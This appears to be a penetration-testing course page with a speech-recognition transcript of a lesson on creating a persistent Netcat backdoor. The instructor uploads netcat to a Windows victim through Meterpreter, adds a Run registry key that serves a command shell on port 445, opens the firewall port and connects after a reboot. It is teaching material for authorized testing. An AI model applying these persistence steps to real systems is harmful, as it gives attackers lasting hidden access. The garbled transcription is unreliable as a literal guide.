Time
5 hours 38 minutes
Difficulty
Intermediate
CEU/CPE
6

Video Description

This lesson covers how to use persistent backdoor with NetCat. Participants receive step by step instructions in how to create a persistent backdoor using the NetCat tool. It allows you to use the port of your choice and pick a program you'd like to run on another computer and then you can connect whenever you want. NetCat is included in the metasploit framework.

Video Transcription

00:04
All right, so now
00:05
we're gonna go a little bit further and
00:08
I'm trying to do at this point is to create a backdoor. We've really seen some back doors,
00:15
but they're not persistent. So we have. It relies on
00:19
the user of the victim rather clicking a running a program, running a file, trying to put that in a place on the system where the load every time they boot, for instance, would be a good technique
00:29
trying to get a virus in the boot, the master boot record or somewhere else and start up folder. Perhaps you can get get that to run.
00:40
But what I want to try to do, in the meantime, is user tool called Net cat.
00:43
And that gets very useful because you can set up a listener on a victim's system
00:48
and pick a port number of your choice and a program that would like to run
00:52
and that lets you connect any time you want
00:55
to. That system, assuming that net cat is running
00:59
so naked is included
01:03
in my interpreter are the best boyfriend work I should say.
01:07
And so what I'm gonna do is run the upload command
01:11
and I think I've got the same July, Ugo. So this is the path user. Share windows, dash binaries and see Dottie XY
01:23
notice I'm using double backslash is as I mentioned before. There are some parsing issues issues, so double backslash just gets us around. That problem,
01:32
but we want to do first is upload the net. Can't execute able to the Windows directory on the victim's system.
01:40
You see it? Let me do that.
01:41
Uh, because again, I am
01:44
the system account. If you're not system, you won't be able to put the file in that directory after
01:49
trying to put it somewhere else.
01:51
But I want to run it from this directory because that's Molly.
01:55
My first choice.
01:59
All right. Now what we're gonna do is
02:01
two at a registry key
02:04
so that we can get this,
02:07
uh,
02:07
program to run every time
02:09
the system boots.
02:20
All right, so
02:22
from my interpreter show,
02:25
I need to type this in very carefully.
02:30
Kill him.
02:32
Software.
02:38
Microsoft,
02:40
who knows
02:45
her version?
02:46
Run.
02:52
I'm missing one of my backsplashes. And I said before that little cause problems. There we go.
03:00
Look.
03:02
So it's my veen where ah, user process
03:08
and I've got another community to run. I'm gonna up arrow to bring back my last one instead of eat registry in Nam Ki I'm going to run the set, Val Command.
03:23
And that should be a TSH k lm software like yourself Windows current version run
03:30
and that I need Thio
03:34
do a little bit after this
03:39
Sonett cat
03:42
Dash D is the values I'm studying
03:45
in this key
03:51
and I'm gonna give it the path to nightcap
03:57
and see no t x c.
04:00
And I'm telling it which port I'd like the listener to run on 445
04:08
and then run command out. He actually as the actual,
04:12
uh, command when the
04:15
listeners connected to
04:17
now, I can query the value that I've just set
04:29
get rid of all this.
04:30
And there are changed that Val to your query valve.
04:40
And this left confirmed that indeed, I have the right parameter set here,
04:46
so I'm running that cat
04:48
persistent.
04:49
Uh, this is the path to it listening port of 4 45 and the command will be command on the exit.
04:58
Okay, So unless next task is to
05:04
go ahead and, uh,
05:06
open up a rule in the firewall
05:10
created will the firewall rather
05:12
so that we can allow this for 45 traffic through
05:16
flower typing here.
05:18
So we're running a nutshell. Advanced firewall,
05:25
Farewell module.
05:27
And then we're gonna add a rule
05:30
we're gonna call the rule.
05:35
That can't just for now. That's fine. We have to specify several parameters here. But all this should make sense. If you worked with firewalls before,
05:44
uh, we're specifying the protocols. TCP
05:46
the local port is for 45
05:53
Direction is inbound,
05:57
the action is allow.
06:01
And the program
06:02
that's being referenced is he calling back slash Windows
06:09
system 32 see Daddy XY.
06:14
It's a little typing.
06:17
Oh, well, the reason that didn't work is because I'm not in a command shell.
06:21
Hold on. One surgeon.
06:30
Their father. I am still system.
06:32
No, I can run that commit.
06:35
Okay, so give me my okay. Statement showed me that the firewall rule worked.
06:45
Now, since I've put the registry key into the
06:50
into this key software Microsoft Windows current version run,
06:56
that means that when I reboot
06:59
the
07:00
virtual machine,
07:01
it should load
07:06
that, um,
07:10
like a program
07:11
listening on 4445
07:15
And go ahead. Pause. So I can reboot.
07:17
Okay, so we lost our mature precession, which is expected when we memory boot,
07:24
and I'm gonna go ahead and go to another command show.
07:28
And now I'm going to see if my Net cat connection actually works.
07:34
So that cat's built into Callie. You don't need to specify its path.
07:43
I'm gonna use the fur boast option,
07:45
and I'll get the address of my victim's system
07:49
and the port number.
08:00
This might take a moment,
08:09
and there we go.
08:11
Give me a message about in Verceles looking fella. That's fine.
08:16
Through a lie.
08:16
I have long been as an administrator, which is good.
08:20
Now, this is a persistent connection that I have to the system. Anytime I wanted
08:24
to log in, I just simply use the net cat and go to this port.
08:30
Very cool.
08:33
All right, that's it for the night cat suction. Thank you.

Up Next

Metasploit

This Metasploit tutorial will teach you to utilize the deep capabilities of Metasploit for penetration testing and help you to prepare to run vulnerability assessments for organizations of any size.

Instructed By

Instructor Profile Image
Dean Pompilio
CEO of SteppingStone Solutions
Instructor